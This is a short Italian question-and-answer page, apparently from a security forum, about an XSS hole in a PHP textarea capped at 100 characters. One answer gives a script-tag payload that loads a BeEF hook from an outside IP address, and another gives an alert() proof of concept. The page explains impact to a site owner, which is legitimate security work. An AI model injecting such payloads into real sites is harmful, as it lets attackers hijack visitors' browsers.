Ho trovato uno script php vulnerabile sul mio sito web. Lo script consente un input dell'utente (textarea), che non è codificato da htmlspecialchars (). Pertanto è possibile aggiungere codice html e javascript. La lunghezza massima consentita di questa textarea è di 100 caratteri. Quale sarebbe l'exploit peggiore o migliore da applicare in questa vulnerabilità?
Modifica: la limitazione dei caratteri è forzata sul lato server da parte di rtrim.
Questa domanda invita risposte soggettive, ma direi che il carico utile:
<script src=http://1.1.1.1:3000/hook.js></script>
In concomitanza con il beEF exploit framework sarebbe vicino al maggior danno che potresti fare perché fornisce un modo per lanciare una serie di altri attacchi.
Ovviamente sostituirai l'indirizzo IP che ho fornito con uno di tuo che punta a un'istanza di BeEF.
Un'altra cosa da guardare - puoi ignorare il limite di 100 caratteri? Se questo limite viene applicato sul lato client, non viene applicato affatto.
Un semplice exploit è semplicemente:
<script>alert("Hacked!");</script>
Simili caselle alert vengono spesso utilizzate come dimostrazione di un exploit XSS perché sono così facili da vedere e capire.
Leggi altre domande sui tag html php web-application xss